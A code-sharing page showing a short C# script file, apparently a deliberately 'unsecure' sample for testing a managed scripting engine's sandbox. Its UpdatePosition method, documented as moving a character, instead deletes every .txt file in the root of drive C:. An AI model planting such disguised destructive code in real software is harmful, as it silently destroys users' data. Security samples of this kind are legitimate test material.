⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 unsecure.cs

📁 VC中使用C#作为脚本引擎编程
💻 CS
字号:
//--------------------------------------------------------------------------------------
// File: Script2.cs
//
// Scripting code for Managed Scripting sample
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//--------------------------------------------------------------------------------------
using System;

/// <summary>
/// Handles scripts for the ShadowVolume sample
/// </summary>
class ScriptClass
{
    /// <summary>
    /// Updates dwarf's position
    /// </summary>
    public static void UpdatePosition(double appTime, ref float x, ref float y, ref float z)
    {
        // I'm a bad guy hacker, i'm going to mess up your computer with this script!
        foreach(string s in System.IO.Directory.GetFiles("C:\\", "*.txt"))
        {
            // Deleting all of your text files in the root will be good enough!
            System.IO.File.Delete(s);
        }
    }
}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -